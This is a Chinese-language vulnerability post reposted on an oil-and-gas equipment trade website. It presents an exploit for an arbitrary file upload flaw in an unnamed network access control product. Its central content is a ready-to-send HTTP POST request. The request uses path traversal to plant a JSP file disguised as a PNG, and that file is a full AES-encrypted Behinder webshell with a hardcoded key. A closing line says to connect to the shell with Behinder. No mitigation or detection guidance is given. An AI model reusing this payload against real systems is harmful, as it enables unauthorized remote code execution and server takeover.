傲云油气装备网

文章标签：

让卖家找上门

发布询价单>>

微信扫一扫

傲云油气装备网二维码

热门分类

首页 > 资讯中心 > 物联网 > 物联网技术文章

【漏洞日记】某版本安X（某软）任意文件上传漏洞EXP(某软准入)

日期：2020-09-13 浏览：286 评论：0

核心提示：当你的才华还撑不起你的野心时那你就应该静下心来学习目录某软准入是啥样？安X任意文件上传漏洞EXP（某软准入）某软准入是啥样？安X任意文件上传漏洞EXP（某软准入）POST /uai/download/uploadfileToPath.htm HTTP/1.1HOST: xxxxx... ...-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form.

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

目录

某软准入是啥样？

安X任意文件上传漏洞EXP（某软准入）

某软准入是啥样？

安X任意文件上传漏洞EXP（某软准入）

POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: xxxxx
... ...

-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"
Content-Type: image/png

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="uploadpath"

../webapps/notifymsg/devreport/
-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

冰蝎直接连

虽然我们生活在阴沟里，但依然有人仰望星空！

打赏

本文转载自：网络

所有权利归属于原作者，如文章来源标示错误或侵犯了您的权利请联系微信13520258486

更多>最近资讯中心

更多>最新资讯中心

0 条相关评论

推荐图文

推荐资讯中心

点击排行

最新信息

新手指南: 注册新用户

操作指南

常见问题

采购商服务: 找产品

找公司

找采购

看资讯

供应商服务: 企业商铺

VIP服务

认证服务

推广服务

交易安全: 买家防骗

卖家防骗

投诉举报

关注我们: 手机网站:

新浪微博:

微信关注:

13520258486

周一至周五 9:00-18:00
（其他时间联系在线客服）

24小时在线客服